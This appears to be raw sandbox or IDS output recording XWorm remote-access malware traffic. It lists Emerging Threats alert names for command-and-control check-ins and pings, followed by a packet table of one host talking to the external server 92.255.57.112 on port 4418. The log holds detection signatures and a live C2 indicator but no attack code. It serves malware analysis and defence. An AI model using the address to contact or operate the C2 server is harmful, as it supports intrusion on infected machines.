2025-01-14T08:28:36.005064+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:36.007395+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:36.489510+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:36.491595+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:37.296156+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:37.308760+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:38.348994+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:38.351281+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:42.036211+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:42.039660+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:42.973564+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:42.984115+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:43.095818+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:43.098048+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:44.925973+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:48.630200+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:48.632500+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:54.584189+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:54.586259+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:56.224582+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:56.481043+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:59.397393+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:59.411702+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.286476+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:10.288599+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.408688+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:10.410806+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.534909+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:10.536690+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.654485+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.659497+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.775817+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.785619+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:14.930046+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:20.787767+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:21.005626+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:21.007583+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:21.127308+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:21.131335+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:26.505737+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:26.510277+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:34.036600+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:34.040662+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:37.114630+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:37.116024+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:37.722426+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:37.739551+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:39.411657+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:39.415353+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:44.932971+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:51.180581+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:51.250458+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:53.588912+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:53.591335+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:00.926930+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:00.932702+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:02.051886+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:02.053255+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:02.201358+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:02.202639+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:13.305969+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:13.307925+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:15.214395+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:21.148508+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:21.244123+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:22.589673+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:22.591934+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:22.980738+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:22.984877+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:28.505065+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:28.506877+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:28.628001+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:28.629443+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:28.749463+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:28.750818+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:28.871836+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:28.873138+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:33.927249+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:33.929262+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:44.927199+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:44.929510+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:45.048649+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:45.180503+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:45.185470+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:56.914325+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:56.916244+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:00.770510+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:00.774964+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:06.161472+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:06.163091+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:07.568542+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:07.570003+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:09.051997+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:09.053540+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:14.979305+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:16.724496+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:16.726844+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:16.846847+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:16.848458+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:22.178348+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:22.187059+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:27.083048+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:27.084367+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:29.286494+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:29.287318+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 08:27:28.522505045 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:28.527426004 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:28.527503967 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:28.662579060 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:28.667395115 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:39.856349945 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:39.861176968 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:40.073057890 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:40.115591049 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:40.116270065 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:40.121114969 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:44.937259912 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:44.987927914 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:51.038036108 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:51.042889118 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:51.255163908 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:51.257204056 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:27:51.264622927 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:27:53.654355049 CET | 64168 | 53 | 192.168.2.6 | 162.159.36.2 |
Jan 14, 2025 08:27:53.659220934 CET | 53 | 64168 | 162.159.36.2 | 192.168.2.6 |
Jan 14, 2025 08:27:53.659300089 CET | 64168 | 53 | 192.168.2.6 | 162.159.36.2 |
Jan 14, 2025 08:27:53.664166927 CET | 53 | 64168 | 162.159.36.2 | 192.168.2.6 |
Jan 14, 2025 08:27:54.117125034 CET | 64168 | 53 | 192.168.2.6 | 162.159.36.2 |
Jan 14, 2025 08:27:54.122241974 CET | 53 | 64168 | 162.159.36.2 | 192.168.2.6 |
Jan 14, 2025 08:27:54.122284889 CET | 64168 | 53 | 192.168.2.6 | 162.159.36.2 |
Jan 14, 2025 08:28:02.225349903 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:02.230293989 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:02.442476034 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:02.445368052 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:02.450201035 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:13.412805080 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:13.417735100 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:13.635190010 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:13.637234926 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:13.642129898 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:14.956835032 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:15.006187916 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:24.600586891 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:24.605521917 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:24.817914009 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:24.820770025 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:24.825716019 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:35.787689924 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:35.792768002 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:36.005064011 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:36.007395029 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:36.012223959 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:36.272273064 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:36.277132034 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:36.489510059 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:36.491595030 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:36.496515989 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:37.055706978 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:37.060592890 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:37.296155930 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:37.308759928 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:37.313813925 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:38.131824970 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:38.136744022 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:38.348994017 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:38.351280928 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:38.357911110 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:41.818912983 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:41.823828936 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:42.036211014 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:42.039659977 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:42.044616938 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:42.756669044 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:42.764537096 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:42.787698984 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:42.793225050 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:42.973563910 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:42.984114885 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
